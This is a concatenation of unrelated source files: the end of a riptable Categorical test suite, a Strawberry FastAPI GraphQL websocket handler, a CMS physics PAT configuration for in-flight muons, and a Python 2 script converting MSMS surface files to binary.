assert_array_equal(shrink_cat.expand_array, np.full(len(cat), filtered_name), f"Given empty values, shrink categorical values should all be invalid '{filtered_name}'.") else: # single categories being the specified misc # TODO - consider any constraints to assert on for the dtype? # The invalid value based on the dtype: e.g., for U32 its -2147483646 # assert_array_equal(shrink_cat._fa, InvalidValuesForDtype) # assert_array_equal(shrink_cat.expand_array, InvalidValuesForDtypeExpanded) # The categories should only contain the misc value. expected_category_array = np.array(misc) assert_array_equal( shrink_cat.category_array, expected_category_array, f"Category array should only contain the '{misc}' category.", ) for arr in shrink_cat.category_dict.values(): assert_array_equal( arr, expected_category_array, f"Category dictionary values should only contain the '{misc}' category.", ) # Test 2 Shrink with same categories cat = categorical.copy(deep=True) # Shrink to all the same categories. shrink_cat = cat.shrink(cat.category_array, misc=misc, inplace=inplace) # Type is preserved after shrinking. assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical." if misc is None: # TODO handle the misc not None case shrink_cat_values, cat_values = shrink_cat.expand_array, cat.expand_array assert_array_equal(shrink_cat_values, cat_values) assert_array_equal(shrink_cat._fa, cat._fa) assert_array_equal(shrink_cat.category_array, cat.category_array) for arr, expected_arr in zip(shrink_cat.category_dict.values(), cat.category_dict.values()): assert_array_equal(arr, expected_arr) # TODO Test 3 Shrink with subset of categories cat = categorical.copy(deep=True) # Shrink to all the same categories. n = int(len(cat) / 2) shrink_cat = cat.shrink(cat.category_array[:n], misc=misc, inplace=inplace) # Type is preserved after shrinking. assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical." @pytest.mark.parametrize( "categoricals", [ # TODO - test categorical construction using numpy and riptable arrays as a separate test # Categorical constructed from python list data pytest.param([Categorical(data) for data in get_categorical_data_factory_method()], id="cat_with_list_values",), # Categorical constructed from numpy array pytest.param( [ Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ], id="cat_with_np_array_values", ), # Categorical constructred from riptable fast array pytest.param( [ Categorical(rt.FastArray(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ], id="cat_with_rt_fastarray_values", ), ], ) def test_sds(categoricals, tmpdir): dir = tmpdir.mkdir("test_categorical_sds") for i, cat in enumerate(categoricals): name = "categorical_" + str(i) p = str(dir.join(name)) save_sds(p, cat) cat2 = load_sds(p) # Test 1 Saved and loaded categoricals should be the same. # TODO vary the meta version optional parameter when calling Categorical._load_from_sds_meta_data assert isinstance(cat2, Categorical) assert_array_equal(cat2._fa, cat._fa) if not cat.ismultikey: # MultiKey Categorical's do not support category_array operation assert_array_equal(cat2.category_array, cat.category_array) for actual, expected in zip(cat2.category_dict.values(), cat.category_dict.values()): assert_array_equal(actual, expected) cat2_values, cat_values = cat2.expand_array, cat.expand_array assert_array_equal(cat2_values, cat_values) # Test 2 As and from meta data Categoricals should be the same. cat3 = Categorical._from_meta_data(*cat._as_meta_data(name=name)) # Saved and loaded categoricals should be the same. assert isinstance(cat3, Categorical) assert_array_equal(cat3._fa, cat._fa) if not cat.ismultikey: # MultiKey Categorical's do not support category_array operation assert_array_equal(cat3.category_array, cat.category_array) for actual, expected in zip(cat3.category_dict.values(), cat.category_dict.values()): assert_array_equal(actual, expected) cat3_values, cat_values = cat3.expand_array, cat.expand_array assert_array_equal(cat3_values, cat_values) @pytest.mark.parametrize( "categoricals", [ # TODO handle CategoryMode IntEnum and Default [ Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ] + [ Categorical(data, base_index=0) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ] ], ) def test_from_bin(categoricals): for cat in categoricals: cat_arr_len = len(cat.category_array) # Test 1 All bin values are in the category array. if cat.base_index == 0: for i in range(cat_arr_len): assert cat.from_bin(i) in cat.category_array elif cat.base_index == 1: for i in range(1, cat_arr_len + 1): assert cat.from_bin(i) in cat.category_array else: raise ValueError(f"Unhandled Categorical base index {cat.base_index}") # Test 2 Handling of invalid input types: base_index and bin. # The bin is not an integer. with pytest.raises(TypeError): cat.from_bin(str(i)) cat.from_bin(float(i)) # Bin value out of range. with pytest.raises(ValueError): cat.from_bin(-1) if cat.base_index == 0: cat.from_bin(cat_arr_len) elif cat.base_index == 1: cat.from_bin(0) cat.from_bin(cat_arr_len + 1) else: raise ValueError(f"Unhandled Categorical base index {cat.base_index}") # The base index is None. cat.grouping._base_index = None with pytest.raises(TypeError): cat.from_bin(1) @pytest.mark.parametrize("cat", get_all_categorical_data()) def test_argsort(cat): assert_array_equal( cat.argsort(), np.argsort(cat._fa), "Categorical argsort should be equivalent to the argsort of the underlying FastArray", ) @pytest.mark.parametrize( "cats", [ pytest.param( [ Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ] ), pytest.param( [Categorical(data) for data in get_categorical_data_factory_method(CategoryMode.MultiKey)], marks=[ pytest.mark.xfail(reason="NotImplementedError: Add categories not supported for MultiKey Categoricals") ], ), ], ) # TODO parameterize across base index 0 and 1 def test_auto_add(cats): for cat in cats: alpha, beta = "alpha", "beta" first_index, last_index = 0, len(cat) - 1 # Test 1 auto_add_on will allow addition of a category if the Categorical is unlocked, # otherwise an error is raised. cat.auto_add_on() cat.unlock() # Categorical is unlocked # Test 1.1 When unlocked and attempting to add a category, the categories should be added. # set the first and last categories cat[first_index] = cat[last_index] = alpha # auto_add_on and unlock should not allow setting beyond the first and last index of categories with pytest.raises(IndexError): # index out of bounds cat[first_index - 1] = alpha cat[last_index + 1] = alpha # category is added at specified index first_category = cat.category_array[cat._fa[first_index] - 1] # TODO normalize the category_array value, which is sometimes a numpy str_ or bytes_ to an ascii and compare # assert cat.category_array[cat._fa[first_index]-1] == alpha # assert at.category_array[cat._fa[last_index]-1] == alpha # added category is in category array and dictionary assert alpha in cat.category_array for categories in cat.category_dict.values(): assert alpha in categories # Test 1.2 When locked and attempting to add a category, an error is raised and the categories should not be added. cat.lock() # Categorical is locked with pytest.raises(IndexError): # cannot add a category since index is locked cat[first_index] = beta assert beta not in cat.category_array for categories in cat.category_dict.values(): assert beta not in categories # Test 2 auto_add_off will prevent category assignment of non-existing categories and raise an error cat.auto_add_off() # Test 2.1 Unlocked case cat.unlock() # Categorical is unlocked with pytest.raises(ValueError): # cannot automatically add categories while auto_add_categories is False cat[first_index] = beta # Test 2.2 Locked case cat.lock() with pytest.raises(IndexError): # cannot add a category since index is locked cat[first_index] = beta @pytest.mark.xfail(reason="rt_numpy.unique() needs to handles multikey categoricals") def test_multikey_categorical_unique(): c = Categorical([arange(3), FA(list('abc'))]) assert len(c.unique()) == c.nunique() @pytest.mark.parametrize("values", [list_bytes, list_unicode, list_true_unicode]) def test_categorical_convert(values): categories = list(set(values)) # pd_c is a pandas Categorical with a missing category. # pandas Categorical will designate the values with a missing category by -1. pd_c = pd.Categorical(values, categories=categories[:-1]) # The output of categorical_convert, when applied to a pandas Categorical, can be used to # construct a riptable Categorical. We test that this handles missing categories correctly. rt_values, rt_categories = rt.categorical_convert(pd_c) cat = rt.Categorical(rt_values, categories=rt_categories) # The invalid category should not be in the Categorical. missing_category = categories[-1] assert missing_category not in cat assert missing_category not in cat._categories assert missing_category not in cat.category_array assert missing_category not in cat.category_dict[next(iter(cat.category_dict))] # values of first key # All other category values should be in the Categorical. for e in categories[:-1]: # assert e in cat # uncomment when test_categorical_convert_xfail is fixed assert e in cat._categories assert e in cat.category_array assert e in cat.category_dict[next(iter(cat.category_dict))] # values of first key @pytest.mark.xfail(reason="RIP-396 - category not in Categorical, but is in Categorical.category_array") @pytest.mark.parametrize("values", [list_bytes,]) def test_categorical_convert_xfail(values): categories = list(set(values)) # pd_c is a pandas Categorical with a missing category. # pandas Categorical will designate the values with a missing category by -1. pd_c = pd.Categorical(values, categories=categories[:-1]) rt_values, rt_categories = rt.categorical_convert(pd_c) cat = rt.Categorical(rt_values, categories=rt_categories) # All other category values should be in the Categorical. for e in categories[:-1]: assert e in cat def test_build_dicts_enum(): str_to_int, int_to_str = Categories.build_dicts_enum(LikertDecision) codes = list(str_to_int.values()) * 2 c = Categorical(codes, categories=LikertDecision) c2 = Categorical(codes, categories=str_to_int) c3 = Categorical(codes, categories=int_to_str) # c is the our oracle Categorical. # Categoricals constructed from any of the dictionaries built by build_dicts_enum # should construct the same Categorical as c. assert_array_equal(c, c2) assert_array_equal(c, c3) @pytest.mark.parametrize("values", [list("abcdef"), [b"a", b"b", b"c", b"d", b"e", b"f"]]) def test_build_dicts_python(values): # int d = {k: v for k, v in enumerate(values)} str_to_int, int_to_str = Categories.build_dicts_python(d) codes = list(d.keys()) * 2 c = Categorical(codes, categories=d) c2 = Categorical(codes, categories=str_to_int) c3 = Categorical(codes, categories=int_to_str) # c is the our oracle Categorical. # Categoricals constructed from any of the dictionaries built by build_dicts_python # should construct the same Categorical as c. assert_array_equal(c, c2) assert_array_equal(c, c3) @pytest.mark.parametrize( "a,b,a_in_b,b_in_a", [ pytest.param(Cat(list('abc')), Cat(list('a')), FA([True, False, False]), FA([True]), id='single_key_overlap'), pytest.param( Cat([FA(list('abc')), FA([1,2,3])]), Cat([FA(list('a')), FA([1])]), FA([True, False, False]), FA([True]), id='single_multikey_overlap' ), pytest.param( Cat([FA(list('abc')), FA([1,2,3])]), Cat([FA(list('ab')), FA([1,2])]), FA([True, True, False]), FA([True, True]), id='two_multikey_overlap' ), pytest.param( Cat([FA(list('abcde')), FA([1,2,3,4,5])]), Cat([FA(list('dc')), FA([4,5])]), FA([False, False, False, True, False]), FA([True, False]), id='single_multikey_overlap2' ), pytest.param( Cat([FA(list('abcde')), FA([1,2,3,4,5])]), Cat([FA(list('aba')), FA([1,2,1])]), FA([True, True, False, False, False]), FA([True, True, True]), id='repeated_key_multikey_overlap' ), pytest.param( Cat([FA(list('abcdeab')), FA([1,2,3,4,5,1,6])]), Cat([FA(list('aba')), FA([1, 2, 1])]), FA([True, True, False, False, False, True, False]), FA([True, True, True]), id='repeated_key_multikey_overlap2' ), ] ) def test_multikey_categorical_isin(a, b, a_in_b, b_in_a): assert_array_equal(a_in_b, a.isin(b)) assert_array_equal(b_in_a, b.isin(a)) # TODO this is a good candidate for a hypothesis test once the CategoricalStrategy is able to generate MultiKey Categoricals f_msg = 'expected to be consistent with cat1.as_singlekey().isin(cat2.as_singlekey()) operation.' assert_array_equal(a.as_singlekey().isin(b.as_singlekey()), a.isin(b), f_msg) assert_array_equal(b.as_singlekey().isin(a.as_singlekey()), b.isin(a), f_msg) _make_unique_test_cases = pytest.mark.parametrize('cat, expected', [ (rt.Cat([1, 1, 2, 2], ['a', 'a']), rt.Cat([1, 1, 1, 1], ['a'])), (rt.Cat([2, 2, 2, 2], ['a', 'a']), rt.Cat([1, 1, 1, 1], ['a'])), (rt.Cat([1, 2, 3, 3], ['a', 'a', 'b']), rt.Cat([1, 1, 2, 2], ['a', 'b'])), (rt.Cat([0, 0, 1, 1], ['a', 'a'], base_index=0), rt.Cat([0, 0, 0, 0], ['a'], base_index=0)), (rt.Cat([1, 1, 1, 1], ['a', 'a'], base_index=0), rt.Cat([0, 0, 0, 0], ['a'], base_index=0)), (rt.Cat([0, 0, 1, 1], ['a', 'b'], base_index=0), rt.Cat([0, 0, 1, 1], ['a', 'b'], base_index=0)), (rt.Cat([1, 1, 2, 2, 3], [99, 99, 101], ), rt.Cat([1, 1, 1, 1, 2], [99, 101])), (rt.Cat([0, 0, 1, 1], [99, 99], base_index=0), rt.Cat([0, 0, 0, 0], [99], base_index=0)), (rt.Cat([0, 0, 1, 1], [99, 101], base_index=0), rt.Cat([0, 0, 1, 1], [99, 101], base_index=0)), (rt.Cat([0, 0, 1, 1, 2, 2], ['a', 'a'], ), rt.Cat([0, 0, 1, 1, 1, 1], ['a'], )), (rt.Cat([0, 0, 1, 1, 2, 2, 3, 3], ['a', 'a', 'b'], ), rt.Cat([0, 0, 1, 1, 1, 1, 2, 2], ['a', 'b'], )), ]) @_make_unique_test_cases def test_category_make_unique_not_inplace(cat, expected): res = cat.category_make_unique() assert (res == expected).all() @pytest.mark.parametrize('base_index', [0, 1]) def test_category_make_unique_multikey(base_index): c1 = Categorical(np.arange(10) % 2, ['a', 'a'], base_index=base_index) c2 = Categorical(np.arange(10) % 3, ['a', 'b', 'c'], base_index=base_index) cat = Categorical([c1, c2], base_index=base_index) res = cat.category_make_unique() assert list(cat) == list(res)
strawberry/fastapi/handlers/graphql_ws_handler.py
TheVinhLuong102/Strawberry
2,062
12687262
from typing import Any from strawberry.asgi.handlers import GraphQLWSHandler as BaseGraphQLWSHandler class GraphQLWSHandler(BaseGraphQLWSHandler): async def get_context(self) -> Any: return await self._get_context() async def get_root_value(self) -> Any: return await self._get_root_value()
PhysicsTools/PatAlgos/test/patTuple_addDecayInFlight_cfg.py
ckamtsikis/cmssw
852
12687280
<gh_stars>100-1000 ## import skeleton process from PhysicsTools.PatAlgos.patTemplate_cfg import * #process.Tracer = cms.Service("Tracer") # load the PAT config process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff") patAlgosToolsTask.add(process.patCandidatesTask) #Temporary customize to the unit tests that fail due to old input samples process.patTaus.skipMissingTauID = True process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff") patAlgosToolsTask.add(process.selectedPatCandidatesTask) ## add inFlightMuons process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi") process.inFlightMuons = cms.EDProducer("PATGenCandsFromSimTracksProducer", src = cms.InputTag("g4SimHits"), ## use "fastSimProducer" for FastSim setStatus = cms.int32(-1), particleTypes = cms.vstring("mu+"), ## picks also mu-, of course filter = cms.vstring("pt > 0.5"), ## just for testing makeMotherLink = cms.bool(True), writeAncestors = cms.bool(True), ## save also the intermediate GEANT ancestors of the muons genParticles = cms.InputTag("genParticles"), ) patAlgosToolsTask.add(process.inFlightMuons) process.out.outputCommands.append('keep *_inFlightMuons_*_*') ## prepare several clones of match associations for status 1, 3 and in flight muons (status -1) process.muMatch3 = process.muonMatch.clone(mcStatus = cms.vint32( 3)) patAlgosToolsTask.add(process.muMatch3) process.muMatch1 = process.muonMatch.clone(mcStatus = cms.vint32( 1)) patAlgosToolsTask.add(process.muMatch1) process.muMatchF = process.muonMatch.clone(mcStatus = cms.vint32(-1),matched = cms.InputTag("inFlightMuons")) patAlgosToolsTask.add(process.muMatchF) process.patMuons.genParticleMatch = cms.VInputTag( cms.InputTag("muMatch3"), cms.InputTag("muMatch1"), cms.InputTag("muMatchF"), ) ## dump event content process.content = cms.EDAnalyzer("EventContentAnalyzer") ## ------------------------------------------------------ # In addition you usually want to change the following # parameters: ## ------------------------------------------------------ # # process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions) # ## ## switch to RECO input from PhysicsTools.PatAlgos.patInputFiles_cff import filesRelValTTbarGENSIMRECO process.source.fileNames = filesRelValTTbarGENSIMRECO # ## process.maxEvents.input = 10 # ## # process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py) # ## process.out.fileName = 'patTuple_addDecayInFlight.root' # ## # process.options.wantSummary = False ## (to suppress the long output at the end of the job)
scripts/msms2bin.py
CyrusBiotechnology/pv
272
12687283
#!/usr/bin/env python """ Converts the MSMS .vert/.face pair into a compact binary format optimized for file size. """ import sys import os from struct import pack def print_usage(code=0): print 'usage: msm2bin.py <input> [output]' print ' input may either point to the .vert or .face file generated by msms' print ' when the output filename is omitted, it defaults to input.bin with' print ' the file extension removed, e.g. surface.vert -> surface.bin' sys.exit(code); def exchange_extension(filename, new_ext): return '%s.%s' % (os.path.splitext(filename)[0], new_ext) def check_exists(filename): if not os.path.exists(filename): print '"%s" does not exists' % filename return False return True def check_readable(filename): if not check_exists(filename): return False if not os.access(filename, os.R_OK): print '"%s" is not readable' % filename return False return True def read_and_pack_vert(filename, out_fd): with open(filename, 'rb') as verts: header = True data = bytes() for line in verts: line = line.strip() if line.startswith('#'): continue if len(line) == 0: continue if header: num_verts = int(line.split()[0]) out_fd.write(pack('!I', num_verts)) header = False continue x, y, z, nx, ny, nz = line.split()[:6] data += pack('!ffffff', float(x), float(y), float(z), float(nx), float(ny), float(nz)) out_fd.write(data) def read_and_pack_faces(filename, out_fd): with open(filename, 'rb') as faces: header = True data = bytes() for line in faces: line = line.strip() if line.startswith('#'): continue if len(line) == 0: continue if header: num_faces = int(line.split()[0]) out_fd.write(pack('!I', num_faces)) header = False continue idx0, idx1, idx2 = line.split()[:3] data += pack('!III', int(idx0), int(idx1), int(idx2)) out_fd.write(data) def main(args): BIN_VERSION = 1 if len(args) < 2: print_usage(-1) vert_filename = exchange_extension(args[1], 'vert') face_filename = exchange_extension(args[1], 'face') output_filename = exchange_extension(args[1], 'bin') if len(args) == 3: output_filename = args[2] if not check_readable(vert_filename) or not check_readable(face_filename): sys.exit(-1) with open(output_filename, 'wb') as out_file: out_file = open(output_filename, 'wb') out_file.write(pack('!I', BIN_VERSION)) read_and_pack_vert(vert_filename, out_file) read_and_pack_faces(face_filename, out_file) if __name__ == '__main__': main(sys.argv)